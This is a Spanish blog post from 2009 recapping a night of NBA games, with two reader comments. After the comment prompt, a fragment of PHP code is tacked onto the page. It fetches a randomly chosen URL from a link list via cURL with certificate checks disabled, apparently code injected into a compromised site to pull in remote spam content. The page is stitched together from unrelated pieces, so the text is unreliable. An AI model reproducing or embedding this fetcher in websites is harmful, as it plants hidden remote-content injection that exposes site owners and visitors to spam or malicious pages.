La Crónica (1/04/2009)

02 de April de 2009 por TheDeerHunter

Con retraso y en formato reducido os presentamos la crónica de la impresionante sesión de baloncesto de la que disfrutamos anoche. Porque hasta los choques a priori menos interesantes fueron espectaculares y emocionantes. Abrochaos los cinturones…

Lo más noticioso de la actualidad NBA es el descenso a los infiernos de Detroit. Anoche se escribió un nuevo capítulo con la debacle en New Jersey. Regreso de Iverson y amenaza velada de retirarse antes de verse saliendo desde el banquillo. Ese tipo de cosas son las que le pierden. Su aportación fue irrelevante y con Rasheed suspendido el juego interior de Detroit al completo (McDyess, Kwane Brown, Maxiell y Amir Jonson) tan solo fue capaz de producir 10 puntos entre todos en 85 minutos. Este equipo transmite una extraña fascinación mezcla de lástima y morbo del “ángel caido”. A pesar de todo tampoco deberíamos olvidar que la operación Iverson tenía un fuerte componente económico que sólo podrá valorarse a partir de la próxima temporada.

Por suerte para los Pistons, los Bobcats no fueron capaces de ganar en Boston a pesar de que tuvieron a los campeones contra las cuerdas buena parte del choque. Los locales sin Garnett no son ni candidatos por mucho que se empeñe Rivers, pero le echaron pundonor a raudales defendiéndose como gato panza arriba hasta la segunda prórroga, donde la genialidad de Ray Allen decidió la historia. Con el petardazo de Calderón y los Raptors en Florida la jugada puede valer un potosí. Cagada de Orlando de tres pares de c…. Si por una de aquellas tienen que jugar 4 veces en el Garden en semifinales de conferencia se acordarán de este día.

La otra conferencia fue la bomba también. Los Suns pretenden vender cara su piel y le engancharon a Houston. Fue un partidazo increíble, de los de “poder a poder”. Por fin vimos a Nash jugar y el conjunto sonó como la mejor filarmónica dirigida por el mejor de los directores. Los Rockets hicieron todo para ganar, pero no era la noche adecuada.

Dos equipos se veían afectados por este resultado, y ninguno de los dos fallaron. Dallas hizo los deberes matándose por ganar a Miami, en el que por un día Wade no estuvo fino y eso se nota, claro. Por su parte Nowitzki impresionante y también muy bien Josh Howard. Terry, en cambio, no terminó de entrar en el partido.

Por su lado, los Hornets ganaron a los Clippers con serias dificultades a pesar de un partidazo de nivel MVP de Chris Paul. Con esta victoria se ponen a un partido del liderato de conferencia y empatados con los Rockets. Increíble.

El resto de los encuentros, como no podía ser de otra manera, partidazos. Duelo a muerte (¡pero si no se jugaban nada!) entre Monta Ellis y Kevin Martin. Entre los dos 92 puntazos de los 284 que se anotaron con una sola prórroga. Podríamos decir que era casi un amistoso pero no creemos que hubiera ningún aficionado que saliera disgustado después de disfrutar del despiporre.

Los Lakers ganaron a duras penas en Milwaukee con Kobe estelar y los Grizzlies hicieron lo propio a Washington con la tríada Mayo-Gay-Gasol como protagonista. Arenas no jugó, por cierto… pero pronto vuelve Haywood. A buenas horas, mangas verdes.

Comenta

2 comentarios a esta entrada

  1. Jabho dice:
    #1

    Los C´s sin Garnett no aspiran ganar seguro… como tampoco aspirarían los Lakers sin Kobe, los Spurs sin Duncan, los Magic sin Howard o los Cavs sin Lebron … y algunos no aspirarían ni a pasar una ronda de PO cosa a la que si aapiran los verdes con o sin Garnett.

      Citar

  2. TheDeerHunter dice:
    #2

    Y nadie aquí ha dicho lo contrario.
    Es Rivers quien (miente) dice que los Celtics son aspirantes a todo con o sin Garnett.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>